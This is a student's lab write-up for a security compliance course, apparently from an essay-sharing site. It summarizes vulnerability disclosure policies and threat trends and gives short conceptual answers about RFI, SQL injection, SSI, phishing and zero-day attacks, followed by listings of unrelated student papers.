Lab 1 Of Aligning An IT Security Assessment - CBU Security Compliance - Lab

1112 words - 5 pages

Juan Carlos
Dr. Marshall
Security Compliance
Lab 4: Aligning an IT Security Assessment
Vulnerability Life Cycle
· Death is the culmination of this vulnerability cycle. When the number of systems vulnerable to an exploit is reduced to an insignificant amount then this stage occurs. It can happen by patching vulnerable systems, retiring old systems, or lack of interest in the exploit by hackers.
Types of Disclosure
· The types of disclosure are listed below
· This policy would mean to keep the information tightly contained so as the general public never learns of its existence.
Full Disclosure
· This would mean that the information about system vulnerabilities and attack tools would be revealed as possible so that potential victims are as knowledgeable as those who attack them.
Limited Disclosure
· The main concept behind limited disclosure is that vulnerability information is shared as few individuals as possible.
Responsible Disclosure
· During this stage of the vulnerability life cycle the method of discovery will determine how responsible disclosure will proceed. Initial contact signals the start of the disclosure stage.
Existing Policies and Proposals
· NTBug Traq Disclosure policy
· Rain Forest Puppy “RF Policy”
· IETF draft
· The Fisher Plan
Threat Activity Trends
· Organizations should monitor all network- connected computers for signs of malicious activity including bot activity and potential security breaches, ensuring that any infected computers are removed from the network and disinfected as soon as possible.
Vulnerability Trends
· Web browser vulnerabilities are a serious security concern due to their role in online fraud and in the propagation of malicious code, spyware, and adware.
Malicious Code trends
· Monitoring trends in the number of new malicious threats can help improve awareness of their danger and underscores the importance of maintaining robust security, including up-to-date antivirus signatures and software patches.
Phishing, Underground Economy Servers, Spam Trends
· Symantec recommends that enterprise users protect themselves against phishing threats by filtering email at the server level through the mail transfer agent. Organizations can also use IP-based filtering upstream as well as HTTP filtering.
There is a long list of reasons why you want to do periodic assessments and an equally long list of why you shouldn’t. An increasing number of organizations are bound by governmental regulations that dictate what security measures you should have in place and how they should be audited. You get to find out whether your security has already been compromised. You might not know unless you look, and you will sleep better at night if you know.
Lab Assessment Questions and Answers
1. What is a PHP Remote File Include attack and why are these prevalent in today’s Internet world? An inclusion attack wherein an attacker can cause the web application to include a remote file by exploiting a web app that dynamically includes external files or scripts.
2. What country is the top of Structured Query Language injection and SQL Slammer infections?TheU.S. Why can’t the U.S. government do anything to prevent these injection attacks and infections? Cybercriminals have made vast improvements to their infrastructure over the last few years. Its expansion is thousands of websites vulnerable to SQL injections.
3. What does it mean to have a policy of nondisclosure in an organization?It is a contract where the parties agree not disclose information covered by the agreement.
4. What trends were tracked when it came to malicious code in 2009 by the Symantec Report researched during this lab?DOS attacks are always common however targeted attacks using advanced persistent threats that occurred in 2009 made headlines.
5. What is phishing? Describe what a typical phishing attack attempts to accomplish. Phishing is a term used to describe various scams that use fraudulent email messages sent by criminal to trick you into divulging personal information.
6. What is the Zero Day Initiative? A program for rewarding security researchers for responsibly disclosing vulnerabilities. Do you think this is valuable and would you participate if you were the managing partner in a large firm? It is valuable for firms in that vulnerabilities are shared so that they can be mitigated before more harm can be done.
7. What is a Server Side Include? What are the ramifications if an SSI exploit is successful? The Server Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields.
8. According to the TippingPoint Report researched in the lab, how do Server Message Block attacks measure up to Hypertext Transfer Protocol attacks in the recent past? In contrast to HTTP attacks, attacks against the SMB protocol, which is the foundation of countless file shares, has dropped over the sampled time period.
9. According to the TippingPoint Report what are some of the PHP RFI payload effects DVLabs has detected? Password brute force, E-mail/MMS Spam relay, Network flood, Malware dropper, Botnet member, Recon and re-infection.
10. Explain the steps it takes to execute a malicious PDF attack as described in the TippingPoint report. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
11. What is a Zero Day attack and how does this relate to an organization’s vulnerability window? It’s an attack that exploits a previously unknown vulnerability in a computer application, one that developers have not had time to address and patch.
12. How can you mitigate the risk from users and employees clicking on an embedded URL link or email attachment from unknown sources? Continue with the controls that the government organization already has in place to combat malicious e-mail. Connect to the Internet via a Trusted Internet Connection. Take measures to protect the actual PCs used by users.
13. When auditing an organization for compliance, what role do IT security policies and an IT security policy framework play in the compliance audit? Since IT systems are used to generate, change, house, and transport that data IT personnel have to build the controls that ensure the information stands up to audit scrutiny.
14. When performing a security assessment why is it a good idea to examine compliance in separate compartments such as the seven domains of a typical IT infrastructure? Each domain has different degrees of risk that require different mitigation solutions. Each domain will have different standards to meet compliance requirements.
15. True or False: Auditing for compliance and performing security assessments to achieve compliance require a checklist of compliance requirements. True.

More like Lab 1 Of Aligning An IT Security Assessment - CBU Security Compliance - Lab

Security Survey Of The University - Bachelors - Research

2177 words - 9 pages ... UMT SECURITY SURVEY NAME: HAMZA JAVED ID: S2016001003 SUBMITTED TO: SIR KALEEM UR REHMAN INTRODUCTION Now a days security is the major concern of every institute, organization, city, country and even our houses because of the prevailing threats that are increasing with the passage of time. If you don’t take security measures properly, you might face huge loss of equipment, theft or even your life therefore it is very important to take security ...

Network Security Proposal Part 1 - CMIT 320 - Assignment

1226 words - 5 pages Free ... I. Analysis and Planning A. Vulnerability Assessment Requirements The security and availability of the school network plays a huge role in the success of those who attend it. In order to provide a secure network environment for the betterment of the students and faculty a vulnerability assessment needs to take place. This vulnerability assessment is used to find where the weaknesses are in a network in order to assist in the protection of the ...

Network And Security Homework 1 - George Mason University - Assignment

657 words - 3 pages ... network interface identification and location addressing. We are currently using IPv4 which uses 32 bit numbers but we are slowly migrating to IPv6 which uses 128bits; making it more secure. An example of an IP address is in IPv4 is and in IPv6 is 2001:db8:0:1234:0:567:8:1. 8. Explain the function of the Transport layer. it’s main function is to provide end-to-end communication over a network as well as is responsible for the ...

Lab Report 4 - Chocolate Cookie Experiment - Prevention 1 - Lab Report

450 words - 2 pages ... student in the class, Preet. · What were your findings? -The findings for this lab was to disclose and write up a BFS sheet for the other student. -Found out how difficult it is being in someones mouth for the very first time. -Discovered the use of many different inter dental products available in the market for every client. · What did you learn? -Learned how to use the new methods we have been taught on each other. Learned how to disclose an agent ...

Lab Report - The Stoichiometry Of An Oxidation-reduction Reaction

444 words - 2 pages ... = .0005 moles/10 mL = moles of hydroxylammonium chlorideRatio of Fe+2 to NH3OH+ = 2:12e- + 2Fe+3 --> 2Fe+2 so transfer of 2 electronsNH3OH+ --> something + 2e-Oxidation number of N in NH3OH+ is -1, therefore the oxidation number for N on the product side must be +1 because it gains 2 electrons.N2O has an oxidation number of +1 for N, so that would work.Data:Equation 1: NH3OH+ + 2Fe+3 --> something + 2Fe+2Equation 2: 8H+ + 5Fe+2 + MnO4 ...

Research Paper On The Pros And Cons Of Social Security

1593 words - 7 pages ... private email, I called Social Security a busted Ponzi scheme, which Mark attempts to refute, too. As far as I'm concerned, that's all beside the point. I have the following objections: 1. Social Security is a Ponzi scheme. Calling it welfare does not make it less so. 2. It may not be Constitutional. 3. Even if it is, it's an expansion of federal powers that I'm opposed to. 4. There are no guarantees. It's not insurance. It's a welfare ...

Potential Threat: The New OAS Concept Of Hemispheric Security

2133 words - 9 pages ... may lead to greater "securitization" of the region's problems, defined as the treatment of these problems as if they were security threats. Securitization carries with it the risk of military responses to problems that are not military in nature and in circumstances where military action is ill-suited or could cause more harm than good, a tendency that is already well under way in Latin America.Risk exists due to 4 main factors:1. Historic tendency ...

Financial Security Of Elderly Americans At Risk - Social Problems - Essay

835 words - 4 pages Free ... struggle at the end, it just doesn’t make sense. It bothers me because I will get there one day, my parents, or my kids. Knowing this worries me because I don’t want to struggle, especially when I am older, which I will need more assistance than ever before. However, how would someone conquer assistance without any money or help from your families. It’s a nightmare; I can’t imagine what they’re going through. The elderly survive of social security ...

Chemoselective Of Aromatic Compounds Lab Report - Organic Chemistry - Lab Report

1624 words - 7 pages Free ... , whose structures are shown below. Figure 1: Structures of the three starting materials: citral, geraniol, and carvone. A type of oxidation reactions that was looked at were epoxidation reactions, which removed a double bond, and replacing it with an oxygen of citral and carvone. Another type of oxidation reaction is the copper oxidation of geraniol that starts with an already present alcohol group, which loses its hydrogen and creates a carbon ...

Search The Internet For IT Governance Planning. - Information Security System - Paper

515 words - 3 pages ... IT governance basically provides an organizational structure for aligning IT strategy with business strategy. In Simple words, it provides framework of best practices and controls for an organization. It enables an organization to make decisions to ensure its IT sustains and expands its strategies and objectives. IT governance ensures that an organization focuses on: 1) Achieving the business goals by utilizing IT strategies 2) Monitoring Risk ...

Science Lab Report On Finding The Boiling Point Of An Unknown Substance

494 words - 2 pages ... temperature suddenly rised from 80 to 86 degrees.Modifications to Original Plan:I got an idea of doing it in turns during the setup for the investigation. Since Sam agrees in my idea, we changed our way of working.Evaluation:Our method used here was fine, if we have turned the fire smaller, there, it may be slow, but the information is more accurate. ...

Lab Report On Lakes And Health Of Rivers - AP Environmental - Lab Report

584 words - 3 pages ... calculations of biological testing, we were able to determine that the river was indeed healthy. For the biological testing, there were many Class 1 macroinvertebrates, which is expected in any river. However, there was not an abundance of Class 2 which have medial tolerance to pollution. Despite the lack of Class 2 macroinvertebrates, the high water quality of the river was confirmed when there were multiple Class 3 macroinvertebrates, which are ...

Comparison Of Strength And Power - Exercise Physiology - Lab Report

1425 words - 6 pages ... quite consistently. Figure 1. Figure 2. Subject four yielded the greatest Vertical Jump score by a reasonable margin, with a result of 0.74m. Despite it testing muscular anaerobic power like two of the other forms of testing batteries, it contained only a weak correlation to them, with no correlation with the isokinetic dynamometry assessment. Across the 28 subjects, the group produced an average jump score of .50metres, and a standard deviation ...

Chemical Reactivity Of Chemicals - Chemistry Grade 11 - Lab

546 words - 3 pages Free ... Chemical Reactivity of Metals Purpose ❖ The purpose of this lab is to study the chemical reactivity of five different metals and discover the periodic trend for the chemical reactivity (most reactive to least reactive) of metals using the observations from the lab. Hypothesis ❖ My prediction was that the metal that is farthest down and to the left on the periodic table (Potassium) will be the most reactive and the metal farthest up and to the ...

Title: Conservation Of Energy Lab Purpose: To Verify That The Total Energy Of An Object Doesn't Change If The Object Hasn't Done Work

667 words - 3 pages ... Title: Conservation of Energy LabPurpose: To verify that the total energy of an object doesn't change if the object hasn't done work.Procedure:1. Attach a photo gate to the bottom of the tube that is attached to a vertical metal rod.2. Attach the photo gate to the computer, and open Mac Motion.3. Record all measurements, tube to ground, tube to photo gate.4. Go get a small piece of PVC pipe that will be dropped through the tube5. Measure both ...